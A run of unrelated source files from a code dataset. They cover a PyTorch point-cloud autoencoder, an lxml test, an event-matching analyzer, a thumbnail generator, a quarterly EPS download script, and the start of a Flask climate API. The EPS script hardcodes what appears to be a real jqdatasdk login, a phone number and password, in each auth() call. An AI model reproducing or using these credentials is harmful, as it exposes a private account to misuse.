VariationalAutoEncoder(nn.Module):\n\n def __init__(self, num_cubes, dev, num_sample_cube=20):\n \"\"\"\n\n :param num_cubes: cube resolution float\n :param threshold: minimum probability to consider as part of the cover of the diff region\n :param num_sample_cube: how many samples to sample per cube\n \"\"\"\n super(VariationalAutoEncoder, self).__init__()\n\n self.num_cubes = num_cubes\n self.n_bins = int(round(num_cubes ** (1. / 3.)))\n\n self.num_sample_cube = num_sample_cube\n self.dev = dev\n\n self.mu = None\n self.sigma = None\n self.probs = None\n\n e0 = torch.arange(-1, 1, 2 / self.n_bins).detach()\n e1 = e0 + 2 / self.n_bins\n\n xv0, yv0, zv0 = torch.meshgrid(e0, e0, e0) # each is (20,20,20)\n self.lower_bound = torch.stack((xv0, yv0, zv0), dim=3).double().to(dev)\n\n xv1, yv1, zv1 = torch.meshgrid(e1, e1, e1) # each is (20,20,20)\n self.upper_bound = torch.stack((xv1, yv1, zv1), dim=3).double().to(dev)\n\n self.encoder = Encoder(num_cubes=num_cubes)\n self.rc = RegularizedClip(lower=self.lower_bound, upper=self.upper_bound, coeff=0.5, method=\"square\")\n self.fl = FilterLocalization()\n self.vloss = VAELoss()\n\n def _reparameterize(self):\n \"\"\"\n This reparameterization trick first generates a uniform distribution sample over the unit sphere,\n then shapes the distribution with the mu and sigma from the encoder.\n This way, we can can calculate the gradient parameterized by this particular random instance.\n\n :param mask: boolean tensor in torch.Size([bs, num_cubes])\n :param mu: Float tensor in torch.Size([bs, 3*num_cubes])\n :param sigma: Float tensor in torch.Size([bs, 3*num_cubes])\n :return: Float tensor in torch.Size([bs, num_samples, 3])\n \"\"\"\n\n vector_size = (self.mu.shape[0], self.num_cubes, self.num_sample_cube, 3)\n\n # sample random standard\n eps = torch.randn(vector_size).to(self.dev)\n eps *= self.sigma.view(self.sigma.shape[0], -1, 1, 3)\n eps += self.mu.view(self.mu.shape[0], -1, 1, 3)\n\n return eps\n\n def forward(self, x, x_target, prob_target):\n \"\"\"\n\n :param prob_target: frequency in ground trout cubes\n :param x_target: missing regions ground trout point cloud\n :param x: partial object point cloud\n :return:\n \"\"\"\n\n self.probs, self.mu, self.sigma = self.encoder(x) # mu, sigma, probs in 
torch.DoubleTensor\n\n ## clipping mu and calculating regulerize loss factor\n self.mu = self.rc(self.mu.view(self.n_bins, self.n_bins, self.n_bins, 3))\n\n z = self._reparameterize()\n\n out = self.fl(self.probs, prob_target, z)\n\n self.vloss(out, x_target)\n\n return out\n\n\nif __name__ == '__main__':\n bs = 1\n num_points = 250\n resulotion = 20 ** 3\n\n train_path = 'C:/Users/sharon/Documents/Research/data/dataset2019/shapenet/chair/'\n # train_path = '/home/coopers/data/chair/'\n obj_id = '03001627'\n\n shapenet = ShapeDiffDataset(train_path, obj_id)\n\n train_loader = torch.utils.data.DataLoader(shapenet, 1, shuffle=True)\n\n x_partial, hist, edges, x_diff = next(iter(train_loader))\n\n # in_data = Variable(torch.rand(bs, 3, num_points))\n # gt_diff = Variable(torch.rand(bs, num_points, 3))\n # gt_prob = Variable(torch.rand(bs, resulotion))\n\n ###########################################\n #\n # encoder = Encoder(num_cubes=resulotion)\n # probs, mu, scale = encoder(in_data)\n #\n # print('probs: ', probs.size()) # prob torch.Size([bs, 1000]) view(prob.shape[0], -1, 3)\n # print('mu: ', mu.size()) # mu torch.Size([bs, 3000])\n # print('scale: ', scale.size()) # scale torch.Size([bs, 9000])\n\n ###########################################\n\n vae = VariationalAutoEncoder(num_cubes=resulotion, dev='cpu').double()\n\n vae_out = vae(x_partial.transpose(2, 1), x_diff, hist.flatten())\n\n print(\"full_out \", vae_out.shape) # torch.Size([1, num_samples, 3])\n\n ###########################################\n\n #### plot centers ####\n # plot_pc([mu_out[0].reshape(-1, 3).detach().numpy()], colors=(\"black\"))\n #\n # z = vae._reparameterize()\n # print(\"params \", z.shape) # torch.Size([1, 1000, 100, 3])\n","sub_path":"src/pytorch/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":6689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653240087","text":"import unittest\nfrom lxml.tests.common_imports import make_doctest\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTests([make_doctest('test_xhtml.txt')])\n return suite\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"desktop/core/ext-py/lxml-4.9.1/src/lxml/html/tests/test_xhtml.py","file_name":"test_xhtml.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"572704899","text":"from typing import List\nfrom src.analysis.interests.ProfAnalyzer import ProfAnalyzer\nfrom src.models.user.AUser import AUser\n\n\ndef _intersection(lst1, lst2):\n return list(set(lst1) & set(lst2))\n\n\ndef _normalize(num_arr):\n if not num_arr: return num_arr\n maxim = max(num_arr)\n return [w / maxim if maxim else w for w in num_arr]\n\n\ndef _needs_met(user_prof_type, at_prof_type):\n return user_prof_type ^ at_prof_type\n\n\ndef _get_common_friends(at_friends, user_friends):\n u_friends_ids = [friend.get('uid') for friend in user_friends]\n a_friends_ids = [friend.get('uid') for friend in at_friends]\n common_friends = [friend for friend in user_friends\n if friend.get('uid') in set(u_friends_ids).intersection(set(a_friends_ids))]\n return common_friends\n\n\ndef normalize(friends):\n if len(friends) == 0: return\n weights = [s.how_interested for s in friends]\n maxim = max(weights)\n if maxim:\n weights = [w / maxim for w in weights]\n for i, friend in enumerate(friends):\n friend.how_interested = weights[i]\n\n\nclass EventAnalyzer:\n \n def set_meetings(self,\n user, 
attenders,\n user_prof_cats, attenders_prof_cats,\n user_prof_type, ats_prof_types,\n user_interests, ats_interests):\n people_to_meet = []\n\n ui = set([pc for pc in user_interests])\n upc = set([pc[0] for pc in user_prof_cats])\n \n for i, attender in enumerate(attenders):\n how_common = 0\n # Common skills\n common_prof_cats = list(upc.intersection(set([pc[0] for pc in attenders_prof_cats[i]])))\n how_common += len(common_prof_cats) * 2\n needs_met = _needs_met(user_prof_type, ats_prof_types[i])\n how_common += 2 * needs_met\n # Common interests\n common_interests = list(ui.intersection(set([pc for pc in ats_interests[i]])))\n how_common += len(common_interests)\n \n people_to_meet.append({\n 'interest_score': how_common,\n 'needs_met': needs_met,\n 'reasons': {\n 'common_prof_cats': list(common_prof_cats),\n 'interests': common_interests\n }\n })\n iscore = _normalize([p['interest_score'] for p in people_to_meet])\n for i, p in enumerate(people_to_meet):\n p['interest_score'] = iscore[i]\n return people_to_meet\n\n def choose_people_for_event(self, friends: List[AUser], event_tags: List[str], prof_analyzer: ProfAnalyzer,\n social_network):\n event_cats = prof_analyzer.get_prof_cats(event_tags)\n ecn = [c[0] for c in event_cats]\n for friend in friends:\n _, user_cats = prof_analyzer.get_prof_keywords(social_network, friend, batch=True)\n ucn = [c[0] for c in user_cats]\n common = _intersection(ecn, ucn)\n how_interested = 0\n for c in common:\n how_interested += event_cats[ecn.index(c)][1]\n friend.how_interested = how_interested\n friends = sorted(friends, key=lambda x: x.how_interested, reverse=True)\n weights = _normalize([s.how_interested for s in friends])\n for i, f in enumerate(friends):\n f.how_interested = weights[i]\n return friends\n\n ","sub_path":"src/analysis/events/EventAnalyzer.py","file_name":"EventAnalyzer.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"170141265","text":"#!/usr/bin/env python3\nimport pprint\nimport os\nfrom PIL import Image\n\n\nclass Thumb:\n @staticmethod\n def exist(file_origin, dist_path, stock):\n \"\"\"\n Проверит существование тумьбочки, если есть то вернет false\n :param dist_path:\n :param file_origin:\n :param stock:\n :return: bool\n \"\"\"\n file_name = str(os.path.split(file_origin)[-1]).split(\".\")[0]\n\n postfix = Thumb.get_postfix(file_origin, stock)\n if str(file_origin).endswith(postfix) is True:\n return True\n\n file_name = \"\".join((file_name, Thumb.get_postfix(file_origin, stock)))\n return os.path.isfile(os.path.join(dist_path, file_name))\n\n @staticmethod\n def create(file_origin, dist_path, stock):\n \"\"\"\n Create thumbal image\n :param file_origin: файл оригинал\n :param dist_path: директория сохранения\n \"\"\"\n\n if Thumb.exist(file_origin, dist_path, stock) is True:\n return True\n\n img = Image.open(file_origin)\n img_org_width = img.size[0]\n img_org_height = img.size[1]\n if img_org_width > img_org_height:\n wpercent = (stock.width / float(img_org_width))\n hsize = int((float(img_org_height) * float(wpercent)))\n img = img.resize((stock.width, hsize), Image.ANTIALIAS)\n img_thumb = Image.new('RGBA', (stock.width, stock.height), 'white')\n offset = (0, int((stock.height - img.size[1]) / 2))\n else:\n wpercent = (stock.height / float(img_org_height))\n hsize = int((float(img_org_width) * float(wpercent)))\n img = img.resize((hsize, stock.height), Image.ANTIALIAS)\n img_thumb = Image.new('RGBA', (stock.width, 
stock.height), 'white')\r\n            offset = (int((stock.width - img.size[0]) / 2), 0)\r\n        img_thumb.paste(img, offset)\r\n        # extension = os.path.splitext(file_origin)[-1].lower()\r\n        file_name = str(os.path.split(file_origin)[-1]).split(\".\")[0]\r\n        postfix = Thumb.get_postfix(file_origin, stock)\r\n\r\n        file_name = \"\".join((file_name, postfix))\r\n\r\n        img_thumb.save(os.path.join(dist_path, file_name))\r\n\r\n    @staticmethod\r\n    def get_postfix(file_origin, stock):\r\n        \"\"\"\r\n        Вернет постфикс создаваемой тумбочки.\r\n        :param stock:\r\n        :param file_origin:\r\n        :return:\r\n        \"\"\"\r\n        extension = os.path.splitext(file_origin)[-1].lower()\r\n\r\n        postfix = str(\"\").join((\"_\", str(stock.width), \"x\", str(stock.height), \"_\", stock.postfix, extension))\r\n\r\n        return postfix\r\n","sub_path":"source/image_thumb.py","file_name":"image_thumb.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"650870729","text":"# encoding = utf-8\r\nfrom jqdatasdk import *\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pandas import DataFrame\r\n\r\n\r\ndef get_eps():\r\n    auth(\"13896700518\", \"HY1995827.HG\")\r\n\r\n    industry_index = list(get_industries(name='sw_l1').index)\r\n    # 所有行业的股票汇总\r\n    stock_reg = []\r\n    for industry in industry_index:\r\n        stock = get_industry_stocks(industry_code=industry)\r\n        for i in stock:\r\n            stock_reg.append(i)\r\n    # 获取财务数据(提取财务数据会自动删除取值为空的股票,因此每个季度返回的财务数据量不一样,使用pd.concat合并)\r\n    q = query(indicator.code, indicator.pubDate, indicator.eps).filter(indicator.code.in_(stock_reg))\r\n    logout()\r\n    return q\r\n\r\n\r\ndef one_data(q):\r\n    auth(\"13896700518\", \"HY1995827.HG\")\r\n    data0 = get_fundamentals(q, statDate='2009q4').T\r\n    col = list(data0.iloc[0, :])\r\n    data0 = DataFrame(DataFrame(data0.iloc[1:, :]))\r\n    data0.columns = col\r\n    data0_csv = data0.to_csv('2009年第四季度每日收益+日期.csv')\r\n\r\n    data1 = get_fundamentals(q, statDate='2010q1').T\r\n    col = list(data1.iloc[0, :])\r\n    data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n    data1.columns = col\r\n    data1_csv = data1.to_csv('2010年第一季度每日收益+日期.csv')\r\n\r\n    data2 = get_fundamentals(q, statDate='2010q2').T\r\n    col = list(data2.iloc[0, :])\r\n    data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n    data2.columns = col\r\n    data2_csv = data2.to_csv('2010年第二季度每日收益+日期.csv')\r\n\r\n    data3 = get_fundamentals(q, statDate='2010q3').T\r\n    col = list(data3.iloc[0, :])\r\n    data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n    data3.columns = col\r\n    data3_csv = data3.to_csv('2010年第三季度每日收益+日期.csv')\r\n\r\n    data4 = get_fundamentals(q, statDate='2010q4').T\r\n    col = list(data4.iloc[0, :])\r\n    data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n    data4.columns = col\r\n    data4_csv = data4.to_csv('2010年第四季度每日收益+日期.csv')\r\n    logout()\r\n\r\n\r\ndef two_data(q):\r\n    auth(\"13896700518\", \"HY1995827.HG\")\r\n    data1 = get_fundamentals(q, statDate='2011q1').T\r\n    col = list(data1.iloc[0, :])\r\n    data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n    data1.columns = col\r\n    data1_csv = data1.to_csv('2011年第一季度每日收益+日期.csv')\r\n\r\n    data2 = get_fundamentals(q, statDate='2011q2').T\r\n    col = list(data2.iloc[0, :])\r\n    data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n    data2.columns = col\r\n    data2_csv = data2.to_csv('2011年第二季度每日收益+日期.csv')\r\n\r\n    data3 = get_fundamentals(q, statDate='2011q3').T\r\n    col = list(data3.iloc[0, :])\r\n    data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n    data3.columns = col\r\n    data3_csv = data3.to_csv('2011年第三季度每日收益+日期.csv')\r\n\r\n    data4 = get_fundamentals(q, 
statDate='2011q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2011年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef three_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2012q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2012年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2012q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2012年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2012q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2012年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2012q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2012年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef four_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2013q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2013年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2013q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2013年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2013q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2013年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2013q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2013年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef five_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2014q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2014年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2014q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2014年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2014q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2014年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2014q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2014年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef six_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2015q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2015年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2015q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = 
data2.to_csv('2015年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2015q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2015年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2015q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2015年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef seven_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2016q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2016年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2016q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2016年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2016q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2016年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2016q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2016年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef eight_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2017q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2017年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2017q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2017年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2017q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2017年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2017q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2017年第四季度每日收益+日期.csv')\r\n logout()\r\n\r\n\r\ndef nine_data(q):\r\n auth(\"13896700518\", \"HY1995827.HG\")\r\n data1 = get_fundamentals(q, statDate='2018q1').T\r\n col = list(data1.iloc[0, :])\r\n data1 = DataFrame(DataFrame(data1.iloc[1:, :]))\r\n data1.columns = col\r\n data1_csv = data1.to_csv('2018年第一季度每日收益+日期.csv')\r\n\r\n data2 = get_fundamentals(q, statDate='2018q2').T\r\n col = list(data2.iloc[0, :])\r\n data2 = DataFrame(DataFrame(data2.iloc[1:, :]))\r\n data2.columns = col\r\n data2_csv = data2.to_csv('2018年第二季度每日收益+日期.csv')\r\n\r\n data3 = get_fundamentals(q, statDate='2018q3').T\r\n col = list(data3.iloc[0, :])\r\n data3 = DataFrame(DataFrame(data3.iloc[1:, :]))\r\n data3.columns = col\r\n data3_csv = data3.to_csv('2018年第三季度每日收益+日期.csv')\r\n\r\n data4 = get_fundamentals(q, statDate='2018q4').T\r\n col = list(data4.iloc[0, :])\r\n data4 = DataFrame(DataFrame(data4.iloc[1:, :]))\r\n data4.columns = col\r\n data4_csv = data4.to_csv('2018年第四季度每日收益+日期.csv')\r\n\r\n logout()\r\n\r\n\r\ndef concat_data():\r\n data2009q4 = pd.read_csv('2009年第四季度每日收益+日期.csv', index_col=0)\r\n data2010q1 = pd.read_csv('2010年第一季度每日收益+日期.csv', index_col=0)\r\n data2010q2 = 
pd.read_csv('2010年第二季度每日收益+日期.csv', index_col=0)\r\n data2010q3 = pd.read_csv('2010年第三季度每日收益+日期.csv', index_col=0)\r\n data2010q4 = pd.read_csv('2010年第四季度每日收益+日期.csv', index_col=0)\r\n data2011q1 = pd.read_csv('2011年第一季度每日收益+日期.csv', index_col=0)\r\n data2011q2 = pd.read_csv('2011年第二季度每日收益+日期.csv', index_col=0)\r\n data2011q3 = pd.read_csv('2011年第三季度每日收益+日期.csv', index_col=0)\r\n data2011q4 = pd.read_csv('2011年第四季度每日收益+日期.csv', index_col=0)\r\n data2012q1 = pd.read_csv('2012年第一季度每日收益+日期.csv', index_col=0)\r\n data2012q2 = pd.read_csv('2012年第二季度每日收益+日期.csv', index_col=0)\r\n data2012q3 = pd.read_csv('2012年第三季度每日收益+日期.csv', index_col=0)\r\n data2012q4 = pd.read_csv('2012年第四季度每日收益+日期.csv', index_col=0)\r\n data2013q1 = pd.read_csv('2013年第一季度每日收益+日期.csv', index_col=0)\r\n data2013q2 = pd.read_csv('2013年第二季度每日收益+日期.csv', index_col=0)\r\n data2013q3 = pd.read_csv('2013年第三季度每日收益+日期.csv', index_col=0)\r\n data2013q4 = pd.read_csv('2013年第四季度每日收益+日期.csv', index_col=0)\r\n data2014q1 = pd.read_csv('2014年第一季度每日收益+日期.csv', index_col=0)\r\n data2014q2 = pd.read_csv('2014年第二季度每日收益+日期.csv', index_col=0)\r\n data2014q3 = pd.read_csv('2014年第三季度每日收益+日期.csv', index_col=0)\r\n data2014q4 = pd.read_csv('2014年第四季度每日收益+日期.csv', index_col=0)\r\n data2015q1 = pd.read_csv('2015年第一季度每日收益+日期.csv', index_col=0)\r\n data2015q2 = pd.read_csv('2015年第二季度每日收益+日期.csv', index_col=0)\r\n data2015q3 = pd.read_csv('2015年第三季度每日收益+日期.csv', index_col=0)\r\n data2015q4 = pd.read_csv('2015年第四季度每日收益+日期.csv', index_col=0)\r\n data2016q1 = pd.read_csv('2016年第一季度每日收益+日期.csv', index_col=0)\r\n data2016q2 = pd.read_csv('2016年第二季度每日收益+日期.csv', index_col=0)\r\n data2016q3 = pd.read_csv('2016年第三季度每日收益+日期.csv', index_col=0)\r\n data2016q4 = pd.read_csv('2016年第四季度每日收益+日期.csv', index_col=0)\r\n data2017q1 = pd.read_csv('2017年第一季度每日收益+日期.csv', index_col=0)\r\n data2017q2 = pd.read_csv('2017年第二季度每日收益+日期.csv', index_col=0)\r\n data2017q3 = pd.read_csv('2017年第三季度每日收益+日期.csv', index_col=0)\r\n data2017q4 = pd.read_csv('2017年第四季度每日收益+日期.csv', index_col=0)\r\n data2018q1 = pd.read_csv('2018年第一季度每日收益+日期.csv', index_col=0)\r\n data2018q2 = pd.read_csv('2018年第二季度每日收益+日期.csv', index_col=0)\r\n data2018q3 = pd.read_csv('2018年第三季度每日收益+日期.csv', index_col=0)\r\n data2018q4 = pd.read_csv('2018年第四季度每日收益+日期.csv', index_col=0)\r\n data = pd.concat([data2009q4, data2010q1, data2010q2, data2010q3, data2010q4,\r\n data2011q1, data2011q2, data2011q3, data2011q4,\r\n data2012q1, data2012q2, data2012q3, data2012q4,\r\n data2013q1, data2013q2, data2013q3, data2013q4,\r\n data2014q1, data2014q2, data2014q3, data2014q4,\r\n data2015q1, data2015q2, data2015q3, data2015q4,\r\n data2016q1, data2016q2, data2016q3, data2016q4,\r\n data2017q1, data2017q2, data2017q3, data2017q4,\r\n data2018q1, data2018q2, data2018q3, data2018q4,], ignore_index=True)\r\n data = DataFrame(data.iloc[:, :-1])\r\n # data_csv = data.to_csv('2010-2018data.csv')\r\n return data\r\n\r\n\r\ndef f(data):\r\n \"\"\"\r\n 财务数据填充\r\n :param data: 数组\r\n :return:\r\n \"\"\"\r\n data_time = data[0:-1:2] # 数组间隔切片,选出所有的日期\r\n data_data = data[1::2] # 选出所有的财务指标\r\n # 处理财务指标的缺失值,后向填充\r\n data_time = data_time.fillna(method='bfill')\r\n data_time = data_time.fillna(method='ffill')\r\n data_data = data_data.fillna(method='bfill')\r\n data_data = data_data.fillna(method='ffill')\r\n data_col = []\r\n row_num = len(data)/2\r\n data_data.index = np.arange(row_num)\r\n data_time.index = np.arange(row_num)\r\n for i in range(int(row_num)):\r\n if i == 0:\r\n if data_time[i] >= '2018-12-31':\r\n n = 
len(pd.date_range(start='2010-01-01', end='2018-12-31', freq='B'))\r\n for m in range(n):\r\n data_col.append(data_data[i])\r\n break\r\n else:\r\n n = len(pd.date_range(start='2010-01-01', end=data_time[i], freq='B'))\r\n for m in range(n):\r\n data_col.append(data_data[i])\r\n\r\n else:\r\n if data_time[i] >= '2018-12-31':\r\n n = len(pd.date_range(start=data_time[i - 1], end='2018-12-31', freq='B'))\r\n for m in range(n - 1):\r\n data_col.append(data_data[i])\r\n break\r\n elif data_time[i] == data_time[i-1]:\r\n n = 0\r\n else:\r\n n = len(pd.date_range(start=data_time[i-1], end=data_time[i], freq='B'))\r\n for m in range(n-1):\r\n data_col.append(data_data[i])\r\n data = pd.Series(data_col)\r\n return data\r\n\r\n\r\ndef process_data(data):\r\n # 财务数据合并\r\n\r\n # 对每支股票进行填充\r\n new_data = data.apply(f, axis=0)\r\n # 输出结果\r\n new_data.index = pd.date_range(start='2010-01-01', end='2018-12-31', freq='B')\r\n new_data.columns = data.columns\r\n # print(new_data)\r\n new_data_csv = new_data.to_csv('2010-2018的净利润+日期.csv')\r\n\r\n\r\ndef main():\r\n # 确定查询字段\r\n q = get_eps()\r\n # 获取10-18年的数据\r\n one_data(q)\r\n two_data(q)\r\n three_data(q)\r\n four_data(q)\r\n five_data(q)\r\n six_data(q)\r\n seven_data(q)\r\n eight_data(q)\r\n nine_data(q)\r\n # 数据合并\r\n data = concat_data()\r\n process_data(data) # 修改文件名\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"季度财务数据.py","file_name":"季度财务数据.py","file_ext":"py","file_size_in_byte":17013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91470827","text":"'''\nWelcome back! Let's create an accessible API of our climate data from our \nquery in SQL Alchemy using Flask. \n\nWe will use SQL Alchemy and ORM to read our data, and create available\nroutes in Flask, where each function returns an API in JSON format \nfrom a specific query.\n\nAs a result, we will have the following available routes: \n- homepage\n- precipitation data of the previous 12 months \n- temperature data of the previous 12 months \n- list of stations\n- calculated tmin, tavg, tmax from a range of the start date to the most \nrecent record\n- calculated tmin, tavg, tmax between a specified start and end date\n\n'''\n\n# import dependencies \nfrom flask import Flask, jsonify\nimport json\nimport pandas as pd \nimport numpy as np\n\n# Python SQL toolkit and Object Relational Mapper\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\n# initialize SQL Alchemy, sqlite database, and Base \nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# initialize classes using Base\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\napp = Flask(__name__) \n\n# function to calculate tavg, tmin, tmax for start and end date\ndef calc_temps(start_date, end_date):\n return session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start_date).filter(Measurement.date <= end_date).all()\n\n# homepage with list of available routes\n@app.route(\"/\")\ndef home():\n return(\n \"
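# Illustrative sketch, separate from the record above: the f() helper expands
# sparse quarterly report values onto a business-day index with bfill/ffill.
# The same effect via a single pandas reindex; dates and values are made up.
import pandas as pd

quarterly = pd.Series(
    [1.2, 1.5, 1.1],
    index=pd.to_datetime(["2018-03-31", "2018-06-30", "2018-09-30"]),
)
bdays = pd.date_range("2018-01-01", "2018-12-31", freq="B")
# Forward-fill each business day from the latest report at or before it,
# then back-fill the days that precede the first report.
daily = quarterly.reindex(bdays, method="ffill").bfill()
print(daily.head())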
Welcome to the Climate Data API\"\n        \"Available routes:\"\n        \"/api/v1.0/precipitation\"\n        \"/api/v1.0/stations
